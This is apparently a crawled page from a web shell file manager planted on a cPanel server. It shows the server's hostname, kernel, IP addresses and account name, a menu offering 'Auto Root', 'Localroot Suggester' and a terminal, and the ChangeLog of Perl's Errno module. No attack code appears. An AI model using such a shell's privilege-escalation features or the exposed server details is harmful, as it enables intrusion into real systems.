Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
ext /
Errno /
Delete
Unzip
Name
Size
Permission
Date
Action
blib
[ DIR ]
drwxr-xr-x
2016-10-10 17:36
t
[ DIR ]
drwxr-xr-x
2015-02-14 16:56
ChangeLog
1.75
KB
-r--r--r--
2014-12-27 11:48
Errno.pm
6.33
KB
-rw-r--r--
2016-10-10 17:36
Errno_pm.PL
11.86
KB
-r--r--r--
2015-01-31 19:48
Makefile
23.17
KB
-rw-r--r--
2016-10-10 17:36
Makefile.PL
1.15
KB
-r--r--r--
2014-12-27 11:48
arch.txt
38
B
-rw-r--r--
2016-10-10 17:36
pm_to_blib
0
B
-rw-r--r--
2016-10-10 17:36
Save
Rename
Errno 1.10 -- Wed Dec 27 08:20:29 CST 2006 * Update with all changes made to core perl repository Change 171 on 2000-09-12 by <calle@lysator.liu.se> (Calle Dybedahl) - Fixed filename-extracting regexp to allow whitespace between "#" and "line", which the cpp on Unicos 9 produces. Change 170 on 1998/07/05 by <gbarr@pobox.com> (Graham Barr) Fixed three problems reported by Hans Mulder for NeXT - Errno_pm.PL does not recognize #define lines because they have whitespace before the '#'. ANSI does not allow that in portable code; that didn't stop the author of NeXT's <errno.h>. - Cpp output lines look like this: #1 "errno.c" Errno_pm.PL does not recognize that format; it wants whitespace before the line number. - Cpp does a syntax check on files with names ending in ".c"; it reports fatal errors on input lines like: "ENOSYS" [[ENOSYS]] Workaround: use $Config{cppstdin}, like Errno 1.04 did. Change 160 on 1998/06/27 by <gbarr@pobox.com> (Graham Barr) - Added patch from Sarathy to support Win32 - Changed use of $Config{cpp} to $Config{cpprun} as suggested by Tom Horsley Change 159 on 1998/06/27 by <gbarr@pobox.com> (Graham Barr) - Changed to use cpp to locate required files - Moved dummy Errno.pm file into d/ - Added support for VMS Change 158 on 1998/06/27 by <gbarr@pobox.com> (Graham Barr) Rename errno.pl to Errno_pm.PL Change 146 on 1998/05/31 by <gbarr@pobox.com> (Graham Barr) Added ChangeLog to MANIFEST Change 140 on 1998/05/23 by <gbarr@pobox.com> (Graham Barr) Fix type in errno.pl Change 139 on 1998/05/23 by <gbarr@pobox.com> (Graham Barr) Moved code to generate Errno.pm into errno.pl Change 136 on 1998/05/19 by <gbarr@pobox.com> (Graham Barr) Changed to use cpp to locate constants Added t/errno.t